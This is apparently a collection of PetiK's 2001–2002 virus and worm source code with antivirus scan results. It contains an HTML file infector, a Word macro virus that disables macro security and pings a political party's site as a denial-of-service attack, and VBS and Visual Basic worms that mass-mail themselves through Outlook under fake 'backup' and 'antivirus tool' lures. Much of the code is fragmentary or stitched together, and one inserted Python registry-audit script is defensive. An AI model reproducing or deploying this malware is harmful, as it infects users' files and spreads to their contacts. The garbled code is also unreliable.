db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Else',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:
ends
end start
HARAM.HTM
<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
On Error Resume Next
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else
glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If
Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
Set bbbbbbbb=upfkupfk.GetFolder(dir)
Set bbblvqgl=bbbbbbbb.Files
For each lvqgvqgl in bbblvqgl
lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
If lvqglvqr="htm" or lvqglvqr="html" Then
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
if rhmwrrhm.ReadLine <> "<haram>" Then
rhmwrrhm.Close()
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
htmorg=rhmwrrhm.ReadAll()
rhmwrrhm.Close()
Set mwrrhmwr=document.body.createTextRange
Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
rhmwrrhm.WriteLine "<haram>"
rhmwrrhm.Write(htmorg)
rhmwrrhm.WriteLine mwrrhmwr.htmltext
rhmwrrhm.Close()
Else
rhmwrrhm.Close()
End If
End If
Next
End If
End Function
</script></body></html>
HARAM.VBS
Additional information
File size: 5192 bytes
MD5...: 722436ae848608575bdf5d7036f3d1a9
SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6
PEiD..: PEtite v2.2
File Haram.htm received on 05.16.2009 11:58:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.2
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 VBS/Navigator.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Navigator.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.83
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 VBS/Navigator.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Navigator
Fortinet 3.117.0.0 2009.05.16 HTML/Vierka.A
GData 19 2009.05.16 VBS.Navigator.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Navigator
McAfee 5616 2009.05.15 W32/PetTick
McAfee+Artemis 5616 2009.05.15 W32/PetTick
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Navigator.gen
NOD32 4080 2009.05.15 VBS/Petik
Norman 6.01.05 2009.05.16 VBS/Navigator.F
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 W32/Petik.U.worm
PCTools 4.4.2.0 2009.05.15 VBS.Ngator.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETTICK.Y
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Ngator.A
Additional information
File size: 1571 bytes
MD5...: b358dde6d08d84cf4571df91509df185
SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51
File Haram.vbs received on 05.16.2009 11:58:35 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.1
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 Heuristic-31
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Randa
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.D5290353
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.84
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Mailworm1
F-Prot 4.4.4.56 2009.05.15 Heuristic-31
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Pica.X@mm
GData 19 2009.05.16 Generic.ScriptWorm.D5290353
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 VBS.Generic.MassMailer
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick.vbs
McAfee+Artemis 5616 2009.05.15 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.Y
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 VBS.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.I-Worm.Lee-Based
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_GENERIC.009
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.15 VBS.Pethar.A
Additional information
File size: 721 bytes
MD5...: 0316dbe5df244e6a4fc18ce96e7b3907
SHA1..: 1fea896705358384a6889d1a223f1416b2880902
' Name : W97M.Blood
' Author : PetiK
' Language : VBA Word
' Date : June 18th 2001
' Size : 2701 byte
'
'
'
'
' Macro AutoOpen : Disables all protection against viruses. Creates
' \WINDOWS\blood.sys and puts the macro code in it. If the Blood key
' does not exist under the Windows key in the registry, W97M.Blood infects "NORMAL.DOT".
' If the current day is the 15th it changes the name of the owner and
' the organization to "BloodMan" and "PetiK Corporation".
'
' Macro HelpAbout : It displays a balloon message.
'
' Macro ViewVBCode : Adds a value in the Run key to disable the mouse
' and displays a message box.
'
' Macro AutoClose : It shows a message box. After that it calls two
' other macros.
' Macro PetiK : Creates the folder \WINDOWS\Blood and puts the file
' TitleBlood.txt in it.
' Macro Attak : It pings the fucking web site of "Front National".
' It's a DoS attack.
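The AutoOpen and ViewVBCode macros described above leave three traces in the registry: the Word macro security level forced to 1, the Blood\InfectDot marker key, and a value under the CurrentVersion\Run key. The following Python is an added defender-side example, not code from PetiK's archive: it parses a registry export in the "Windows Registry Editor Version 5.00" text format and reports those traces, together with the "Haram" Run value the I-Worm.Haram listing above writes. The sample export and the mapping from value names to sources are constructed for the example; the key paths and value names themselves come from the page.

```python
"""Audit a registry export (.reg text) for the changes W97M.Blood makes and for the
Run-key persistence named in the listings on this page. Sample export is constructed."""
import re
from typing import Dict, List

# Run-key value names taken from the page's sources, mapped to the source that writes them
# (the mapping is this example's own annotation).
KNOWN_RUN_VALUES = {
    "blood1": "W97M.Blood ViewVBCode macro (rundll32 mouse,disable)",
    "haram": "I-Worm.Haram copy_worm (SHSetValueA)",
}
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
WORD_SECURITY = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\([\d.]+)\\Word\\Security$", re.I)
BLOOD_MARKER = re.compile(r"^HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Blood$", re.I)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for 'Windows Registry Editor Version 5.00' exports: [key] headers
    followed by "name"=value lines. Quoted strings are unescaped and dword: values are
    converted to decimal text; other value types are kept verbatim."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = name.strip().strip('"') or "@"
        if value.lower().startswith("dword:"):
            parsed = str(int(value[6:], 16))
        elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            parsed = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            parsed = value
        keys[current][name] = parsed
    return keys


def audit(reg_text: str) -> List[Dict[str, str]]:
    """Return one finding per indicator present in the export."""
    findings: List[Dict[str, str]] = []
    for key, values in parse_reg(reg_text).items():
        m = WORD_SECURITY.match(key)
        if m and values.get("Level") == "1":
            # Level 1 is "Low": macros run without any prompt, which is what AutoOpen sets.
            findings.append({"kind": "word_macro_security_low", "office": m.group(1), "key": key})
        if BLOOD_MARKER.match(key):
            # AutoOpen writes InfectDot=OK here once NORMAL.DOT has been infected.
            findings.append({"kind": "blood_infectdot_marker", "key": key,
                             "InfectDot": values.get("InfectDot", "")})
        if RUN_KEY.search(key):
            for name, data in values.items():
                source = KNOWN_RUN_VALUES.get(name.lower())
                if source:
                    findings.append({"kind": "known_run_value", "name": name,
                                     "data": data, "source": source})
    return findings


# Constructed sample export: one benign Run value plus the three traces described above.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="C:\\Windows\\SOUNDMAN.EXE"
"Blood1"="rundll32 mouse,disable"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Blood]
"InfectDot"="OK"
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print(finding)
```

On a live system the export comes from `reg export` of the two hives; the parser deliberately ignores hex(...) and multi-line values so that it never misreads a binary blob as a string.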
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.Import DropFile
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
If Day(Now) = 15 Then
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") =
"BloodMan"
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\",
"RegisteredOrganization") = "PetiK Corporation"
End If
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") =
"rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical,
"W97M.Blood"
ShowVisualBasicEditor = True
End Sub
Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub
Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " Bye. PetiK"
Close #1
FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly
End Sub
Sub Attak()
Shell "ping -l 5000 -t www.front-national.fr", vbHide
Shell "ping -l 5000 -t front-national.fr", vbHide
End Sub
File Blood.doc received on 05.16.2009 10:45:39 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petman.A!IK
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.15 W97M/Petman.A
Avast 4.8.1335.0 2009.05.15 MW97:Petman-A
AVG 8.5.0.336 2009.05.15 W97M/Petman
BitDefender 7.2 2009.05.16 W97M.Petman.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Petik
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNtp
eTrust-Vet 31.6.6508 2009.05.16 W97M/Petman.A
F-Prot 4.4.4.56 2009.05.15 W97M/Petman.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Petman.A
GData 19 2009.05.16 W97M.Petman.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petman.A
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Petman.A
NOD32 4080 2009.05.15 W97M/Petman.A
Norman 6.01.05 2009.05.16 W97M/Petman.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petman.A
Panda 10.0.0.14 2009.05.15 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.15 WORD.97.Petik.M
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word97.Petik
Sophos 4.41.0 2009.05.16 WM97/Dool-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik (v)
Symantec 1.4.4.12 2009.05.16 W97M.Pet_Tick.Intd
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETMAN.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Blood
ViRobot 2009.5.15.1737 2009.05.15 W97M.Petman.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petik.M
Additional information
File size: 36864 bytes
MD5...: 8cd23603a72f1dcbdf22e03d49c17f83
SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335
' Name : VBS.Cachemire
' Author : PetiK
' Language : VBS
' Date : 19/06/2002
fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
nt="Network"
crlf=Chr(13)&Chr(10)
Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close
y=0
Do Until y=Day(Now)
Sub spreadout()
y=y+1
Loop
If Day(Now) = Int((31 * Rnd) + 1) Then
ws.Run "notepad.exe"
wscript.Sleep 200
ws.SendKeys "Date : " & date & vbLf
ws.SendKeys "Time : " & time & crlf
x = 0
Do Until x=6
num = Int((6 * Rnd) + 1)
If num = 1 Then
mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous"
& vbCrlf
ElseIf num = 2 Then mess = "Why do you click unknown file ??" & crlf
ElseIf num = 3 Then mess = "A new creation coded by PetiK/[b8]" & crlf
ElseIf num = 4 Then mess = "Contact an AV support to disinfect your system" & crlf
ElseIf num = 5 Then mess = "Be careful next time" & crlf
ElseIf num = 6 Then mess = "Curiosity is bad" & crlf
End If
For i = 1 to Len(mess)
ws.SendKeys Mid(mess,i,1)
wscript.Sleep 50
Next
x=x+1
Loop
End If
End If
Sub spreadnetwrk(nname)
Set drve = ntw.EnumNetworkDrives
If drve.Count > 0 Then
For j = 0 To drve.Count -1
If drve.Item(j) <> "" Then
fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname)
End If
Next
End If
End Sub
Sub spreadout()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Backup your system..."
F.Body="Use this tool to create a backup of your system..."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(sys&"\MsBackup.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Cachemire.vbs received on 05.16.2009 11:21:06 (CET)
Additional information
File size: 2832 bytes
MD5...: 175dbf33282ed471b62d616be435a03f
SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376
' Name : W32.HLLW.Mars
' Author : PetiK
' Language : Visual Basic
' Date : 20/06/2002
'
'
'
'
Attribute VB_Name = "Module1"
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA"
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As
Long, ByVal dwReserved As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent
As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As
String, ByVal lFlags As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As
Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal
sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal
hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal
dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA"
(ByVal lpPathName As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public sysDir As String
Public winDir As String
Public orig As String
Public cop As String
Const CSIDL_STARTUP = &H7
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
On Error Resume Next
Dim sp, ext(1 To 9) As String, exts
ext(1) = "index.htm"
ext(2) = "index.html"
ext(3) = "index.asp"
ext(4) = "default.htm"
ext(5) = "default.html"
ext(6) = "default.asp"
ext(7) = "main.htm"
ext(8) = "main.html"
ext(9) = "main.asp"
Set ws = CreateObject("WScript.Shell")
sysDir = Space(500)
sysDir = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir)))
winDir = Space(500)
winDir = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir)))
orig = App.Path & "\" & App.EXEName & ".exe"
Call Install
Call VbsDrop
Call InfectExe(sysDir)
Call InfectExe(winDir)
checkconnect:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect
End Sub
Sub Install()
On Error Resume Next
Set ws = CreateObject("WScript.Shell")
FileCopy orig, sysDir & "\DebugW32.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir &
"\DebugW32.exe"
End Sub
Sub VbsDrop()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs"
For j = 1 To Len(sbufr)
If Mid(sBuffer, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(sBuffer, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call SendMail(mlto)
End If
Next
End Sub
Additional information
File size: 12800 bytes
MD5...: 1b81a0863eafb1a4b260df5c7c1d8621
SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : W32.HLLW.DocTor
' Author : PetiK
' Language : Visual Basic
' Date : 22/06/2002
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
org = App.Path & "\" & App.EXEName & ".exe"
docv = "C:\"
Randomize (Timer)
For i = 1 To 8
docv = docv & Chr(Int(Rnd(1) * 26) + 97)
Next i
docv = docv & ".txt"
Call Install
Call DocVir
Call VbsDrop
Else
Sleep 20000
DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
chkinet:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet
Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
If out = "Outlook" Then
map.Logon "profile", "password"
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 500 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "NewTool for Word Macro Virus"
mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf &
_
"Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _
"Best Regards. Have a nice day"
mel.Attachments.Add orig, 1, 1, "DocTor.exe"
mel.Send
e = ""
Next y
map.Logoff
End If
End If
End Sub
Sub Install()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
End Sub
Sub DocVir()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
Sub VbsDrop()
On Error Resume Next
vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Private Sub Document_Open()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
pef = "4D5A900000000000..."
pef = pef & "0000000000C00000..."
pef = pef & "53206D6F64652E0D..."
pef = pef & "2AAA88526963689D..."
pef = pef & "00000000000000"
pef = pef & ""
Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
End Sub
File DocTor.exe received on 05.16.2009 11:30:42 (CET)
Additional information
File size: 11776 bytes
MD5...: 76ff0b311e26f1322c63023c30c54549
SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
File DocTor.doc received on 05.16.2009 11:30:41 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Dotor
AntiVir 7.9.0.168 2009.05.15 W2000M/Bumdoc.A
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Dotor
Authentium 5.1.2.4 2009.05.15 W97M/Dotor.A
Avast 4.8.1335.0 2009.05.15 MW97:Dotor-A
AVG 8.5.0.336 2009.05.15 W97M/Bumdoc
BitDefender 7.2 2009.05.16 W97M.Dotor.A
CAT-QuickHeal 10.00 2009.05.15 W97M.Ethan
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 W97M.Doctor
eSafe 7.0.17.0 2009.05.14 O97M.GNinducc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Dotor.A
F-Prot 4.4.4.56 2009.05.15 W97M/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W97M/Dotor.A
GData 19 2009.05.16 W97M.Dotor.A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Bumdoc.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Dotor.A
NOD32 4080 2009.05.15 W97M/Dotor.A
Norman 6.01.05 2009.05.16 W97M/Dotor.A
nProtect 2009.1.8.0 2009.05.16 W97M.Dotor.A
Panda 10.0.0.14 2009.05.15 W97M/Dotor.A
PCTools 4.4.2.0 2009.05.15 WORD.97.Pettor.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Dotor.A (v)
Symantec 1.4.4.12 2009.05.16 W97M.Dotor.A@mm
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 W97M.Dotor.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Pettor.A
Additional information
File size: 77312 bytes
MD5...: 762645157dbc893c564928edfed2413b
SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc
' Name : VBS.Park
' Author : PetiK
' Language : VBS
' Date : 24/06/2002
Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close
f="virhex="""
Sub list(dir)
On Error Resume Next
For each ssf in fs.GetFolder(dir).SubFolders
infect(ssf.path)
list(ssf.path)
Next
End Sub
Sub infect(dir)
For each fil in fs.GetFolder(dir).Files
ext=lcase(fs.GetExtensionName(fil.path))
If ext="vbs" Then
Set vb=fs.OpenTextFile(Q.path,1)
If vb.ReadLine <> ""'VBS.Park"" Then
vbsorg=vb.ReadAll()
vb.Close
Set vb=fs.OpenTextFile(Q.path,2)
vb.WriteLine read(virhex)
vb.WriteLine vbsorg
vb.Close
Else
vb.Close
End If
Set ht=fs.OpentextFile(P.path,1)
htmf=ht.ReadAll
ht.Close
If InStr(1,htmf,"virhex",1) = 0 Then
